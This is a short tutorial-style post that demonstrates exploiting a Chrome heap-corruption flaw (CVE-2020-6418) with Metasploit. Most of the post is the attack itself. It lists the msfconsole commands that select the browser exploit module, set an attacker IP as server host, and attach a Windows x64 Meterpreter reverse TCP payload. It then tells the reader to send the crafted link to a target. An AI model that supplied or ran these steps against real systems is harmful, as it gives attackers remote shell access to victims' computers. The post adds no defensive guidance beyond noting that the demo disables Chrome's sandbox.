Hello Everyone, this post demonstration exploitation of google chrome vulnerability occurred in 80.0.3987.122 version. Which is CVE-2020-6418,allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2020-6418
Metasploit Framework included exploit of this vulnerability, so let’s search for modules related to chrome and select the specific one that we required.
msfconsole search chrome //To Search modules related to chrome
Select and copy the exploit given below from list
use exploit/multi/browser/chrome_jscreate_sideeffect set srvhost 192.168.43.19 //Attacker IP set uripath /
also need to set payload, we are targeting Windows 10 x64
set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.43.19 exploit
now need to share the link which having crafted html to our target.
On target system make sure that your launching chrome with no-sandbox option for that you can open cmd and run command start chrome –no-sandbox and open link.